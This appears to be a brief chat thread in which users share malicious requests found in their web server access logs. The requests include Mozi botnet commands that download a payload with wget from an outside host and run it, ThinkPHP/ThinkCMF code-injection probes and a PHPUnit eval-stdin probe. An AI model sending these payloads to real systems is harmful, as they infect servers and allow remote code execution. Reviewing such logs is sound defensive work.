The curiousity is killing me of course, so I guess I will have to fire up a virtual machine to see what kind of virus it is.
@Chizu when I randomly checked my access logs I got something along the lines of `/sh?cd+/tmp+&&+wget <ipaddr/url/Mozi.a>+&&/tmp/Mozi.a`
string dumping it showed it had a bunch of embedded networking shit. bit torrent trackers, http headers, ip table rules, a long list of weak passwords, and ip addresses. it's fun to look at these
@Chizu they're constant spam. mostly trying default passwords or code injection
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
/shell?cd+/tmp;rm+-rf+*;wget+http://<ip was here>/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
